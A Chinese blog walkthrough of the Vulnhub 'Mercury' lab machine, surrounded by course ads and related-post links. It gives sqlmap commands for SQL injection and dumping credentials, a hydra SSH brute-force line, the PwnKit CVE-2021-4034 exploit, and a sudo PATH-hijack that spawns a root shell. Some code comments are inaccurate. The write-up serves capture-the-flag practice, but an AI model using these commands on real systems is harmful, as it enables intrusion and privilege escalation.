看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets Mercury_mercury 靶场

最新推荐文章于 2024-08-31 11:14:48 发布
最新推荐文章于 2024-08-31 11:14:48 发布
阅读量449 收藏 10
点赞数 4
分类专栏: 程序员 文章标签: 单元测试 功能测试 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84788430/article/details/138770956
版权

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

渗透机:kali IP :192.168.0.105 靶机IP :192.168.0.103

使用命令:nmap -sS -sV -A -n -p- 192.168.0.103

在这里插入图片描述
开启了228080端口老样子先访问,说还在开发中直接扫后台dirsearch 扫到了一个robots.txt进行访问,得到三个路径分别访问!

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

②:漏洞发现:

在这里插入图片描述
这里点进去我们可以发现存在1 可能存在SQL注入漏洞 直接使用sqlmap测一下 发现可以

 sqlmap -u "http://192.168.0.103:8080/mercuryfacts/2" --dbs --batch  #发现数据库

在这里插入图片描述

sqlmap -u "http://192.168.0.103:8080/mercuryfacts/2" -D mercury --tables --batch #爆破数据表

在这里插入图片描述

sqlmap -u "http://192.168.0.103:8080/mercuryfacts/2" -D mercury -T users --dump --batch  #获取字段内容

在这里插入图片描述
这里得到了几组账号和密码分别进行尝试最后一个就是SSH账号密码尝试登入,登入成功!!!

johnny1987  john
lovemykids111  laura
lovemybeer111  sam
mercuryisthesizeof0.056Earths  webmaster
hydra -l webmaster -P user.txt ssh://192.168.0.103    #可以尝试九头蛇进行爆破

在这里插入图片描述

③:SSH登入:

在这里插入图片描述
SSH私钥验证登入,获取第一个FLAG接下来就是提取了。

在这里插入图片描述
在这里插入图片描述
~下面发现了一个notes.txt文件查看有一串Base64编码解码得:mercurymeandiameteris4880km

在这里插入图片描述
在这里插入图片描述
切换linuxmaster用户 使用命令:find / -perm -4000 -type f 2>/dev/null

sudo -l 发现有可以执行得sudo命令

④:CVE-2021-4034漏洞提权:
git clone https://github.com/berdav/CVE-2021-4034 #如果下载不了就本机下,然后拖带kaili里面
mack #会生成一个/cve-2021-4034
./cve-2021-4034 #运行即是root权限

这里可麻烦了我搞了半天 先是本机git访问不到github 然后下载kali拖进去
因为靶机里面是没有unzip得所以要将所有文件打包tar才行 然后开启apache2服务 使用wget进行下载
为了更好得查看先建个目录不然解压出来很乱 然后执行make 进行编译 在运行/cve-2021-4034即可。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
PS:因为这个漏洞很吊 我本地kali运行也可以提权 当时搞错了本机找了半天flag文件没找到(原谅我得无知尴尬,哈哈哈)

⑤:获取FALG:

在这里插入图片描述

⑥:Sudo+SETENV(环境变量)提权(第二种提权方法):

没办法追求完美 所有要做一下第二种方法!

sudo -l 查看一下 可以执行root权限得sudo命令

在这里插入图片描述
原理:sudo运行时默认会启用env_reset选项将从命令行设置的环境变量复原,因此通常情况下,当使用sudo命令时,通过本地修改环境变量也没法替换目标文件来进行提权,但如果sudo在配置时为用户设置了SETENV选项情况就不一样了SETENV 会允许用户禁用env_reset选项,允许sudo使用当前用户命令行中设置的环境变量

echo "/bin/bash" > tail   #从/bin目录复制一个vim,并命名为tail存在/tmp目录下
chmod 777 tail #给个权限
export PATH=.:$PATH  #将/tmp目录放置在PATH环境变量的最前面
sudo --preserve-env=PATH /usr/bin/check_syslog.sh   #伪造的tail命令,从而用vim进行提权



![img](https://img-blog.csdnimg.cn/img_convert/402c4525f90f2f8d3bcfcad9b67665b0.png)
![img](https://img-blog.csdnimg.cn/img_convert/68d00e01a9b2b0ee6013e801cf74bcb9.png)

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化的资料的朋友,可以戳这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

s.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84788430
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mercury 靶机 wp
m0_52496313的博客
10-08 457
Mercury 靶机 wp
vulnhub靶机DC-9渗透测试
Long_gone的博客
01-21 2452
一、信息收集 首先用netdiscover确定靶机IP: 确定靶机IP为:192.168.1.109后开始扫描它的端口开放情况: namp -sV -A -p 0-65535 1192.168.1.109 发现它只开放了22和80端口,发现ssh服务被过滤掉了,这就使我们用不了ssh服务,先不管它。然后先访问一下80端口: 是一个这样的页面,其中还有4个选项,依次点开以后并没有什么发现,但...
mercury靶机
woshicainiao666的博客
01-10 1023
不与伪君子争名,不与真小人争利,不与执拗人争理,不与匹夫争勇,不与酸儒争才。不与蠢人施恩。
星球系列靶机Mercury
m0_74950307的博客
05-07 325
靶机上的tmp目录下载了漏洞脚本后是一个zip文件,但是使用unzip不能解压,所以可以使用在本机解压后在进行压缩为tar,而且可以看到:存在一个8080端口的http服务,还有一个ssh,而且网址是使用py脚本编辑的。获得了靶机的IP:192.168.108.142。扫描到了robots.txt。然后就可以使用tar进行解压。
vulnhub靶机mercury
weixin_53665747的博客
07-17 137
靶机整体简单,没什么难度。
靶机渗透练习82-The PlanetsMercury
hirak0的博客
04-25 5168
靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-mercury,544/ Description Difficulty: Easy Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested o
VulnHub-dc-1靶机渗透测试
MzHeader的博客
11-02 533
0x00 前言 在开始之前我们需要先配置一下环境,因不知道DC-1靶机的IP,所有我们需要将靶机和kali放在同一个局域网里面,我这里是桥接。 0x01 探测目标 kali:192.168.199.241 首先,我们先来探测一下目标机器的IP,这里有很多种方法,着重讲一下其中2种方法。 (1)运行arp-scan识别目标的IP地址 使用arp-scan -l命令探测同一区域中存活主机。 (2)使...
靶机渗透测试实战(八)——Billu_creat_Files渗透实战
橘子女侠
05-11 2876
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
渗透靶场——Vulnhub:Billu_Box
tlovejr的博客
02-25 1045
部署环境: 提供镜像文件后,直接用虚拟机打开即可(中间会遇到错误什么的,直接点击重试或者继续即可),连接方式用NET方式连接。 Kali机ip地址:192.168.40.129 靶机ip地址:192.168.40.149 首先查看存活的靶机ip地址,在这里一共有三种方法,可以自己选择一种自己比较喜欢的。 nmap探测存活主机 Nmap -sn 192.168.40.0/24 Netdiscover探测存活主机(时间会有点长) netdiscover -i eth0 -r 192.168.
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
渗透测试模拟实战——暴力破解、留定时任务后门与shift粘贴键后门、植入WaKuang程序(对应靶场和wakuang样本)
03-24
渗透测试模拟实战——暴力破解、留定时任务后门与shift粘贴键后门、植入WaKuang程序(靶机系统:Windows2008)对应的靶场和wakuang样本,参考程链接:...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
红队打靶:THE PLANETS: MERCURY打靶思路详解(vulnhub
Bossfrank的博客
09-29 853
本文是vulnhub靶机THE PLANETS: MERCURY的详细打靶过程。靶机不难,但体现了渗透的常见思维方式。打靶过程有一种按图索骥的感觉,非常有逻辑的思考。当我们目录爆破没什么思路的时候,可以在url中尝试错误的路径,尝试是否有报错的回显提示信息。特别关注url的信息,可能存在遍历和sql注入,此外,本文提权的思路与逻辑也需要读者深入理解。
mercury(--preserver-env提权)
m0_66299232的博客
10-13 748
最关键的一点是.sh文件的执行主要靠syslog的运行 而tail这个命令,他又只显示最后十行,我们又要利用tail,所以软连接vi 用vi来中断执行达到提权目的。5.cat一下这个.sh文件 发现他是用tail ,tail -n 10 /var/log/syslog是显示syslog文件最后十行,2.sudo -l 需要进行输入密码 这是没有sudo权限 然后进行ls -l /home 查看家目录下文件。sudo --preserve-env=PATH /usr/bin/check_syslog.sh
vulnhub靶场——THE PLANETS: MERCURY
Czheisenberg的博客
02-12 2421
vulnhub靶场——THE PLANETS: MERCURY
这篇 玩转渗透测试靶机Vulnhub——The Planets:Mercury
Aluxian_的博客
07-09 921
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机难度中等吧1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.sqlmap基本使用这里就不讲了DC3有写或者别的文章也有讲,ssh-keygen得登入!3.漏洞得利用(漏洞很强大!4.(环境变量)提权得学习
xing-vulnhub-mercury靶场#渗透测试
chinese_cabbage0的博客
01-31 954
此笔记本是个人笔记,所有看起来并不是很详细,所以大家见谅。后续发布的靶场wp我会通过截图,等其他方法让大家更好的理解,学习
vulnhub-Mercury
yutianovo的博客
09-27 575
靶机描述 Difficulty: Easy Mercury is an easier box, with no bruteforcing required. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or
测试工程师学历路径:从功能测试到测试开发
最新发布
weixin_47314038的博客
08-31 1055
功能测试虽然不需要对每种测试类型的技能都掌握,但应对性能测试、安全测试等理论知识有所了解。常见有python自动化和java自动化,此处以python为例。目前我能想到的只有这些,欢迎大家批评指正。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值